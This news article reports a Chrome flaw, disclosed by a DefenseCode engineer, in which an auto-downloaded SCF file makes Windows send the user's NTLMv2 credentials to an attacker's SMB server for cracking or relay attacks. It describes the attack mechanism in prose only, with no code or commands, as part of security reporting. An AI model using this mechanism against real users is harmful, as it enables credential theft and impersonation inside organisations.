A flaw in Google Chrome could allow criminals to infect a victim’s machine with malware and steal Windows credentials. The flaw could also allow SMB relay attacks to be launched.
The flaw was discovered by Bosko Stankovic, security engineer at DefenseCode, In a blogpost he said that once a victim is duped into clicking on a malicious link in a Chrome browser window, this could then download a Windows Explorer Shell Command File or SCF file. Chrome automatically deems such files as safe.
The file does nothing until the download directory window is opened. The SCF automatically tries to retrieve an icon associated with the file. To do so, the user’s computer presents its credentials to a remote server (user ID and password). In turn, this information is revealed to the hacker.
“The remote SMB server set up by the attacker is ready to capture the victim’s username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password,” said Stankovic.
He said that an attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim’s authentication credentials.
“Even if the victim is not a privileged user (for example, an administrator), such vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources,” he added.
The credentials can also be used in an SMB relay attack.
“Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password.”
Stankovic said he hoped that an update for Google Chrome would be rolled out to fix the issue. He added that Google has been notified of the problem.
This article originally appeared at scmagazineuk.com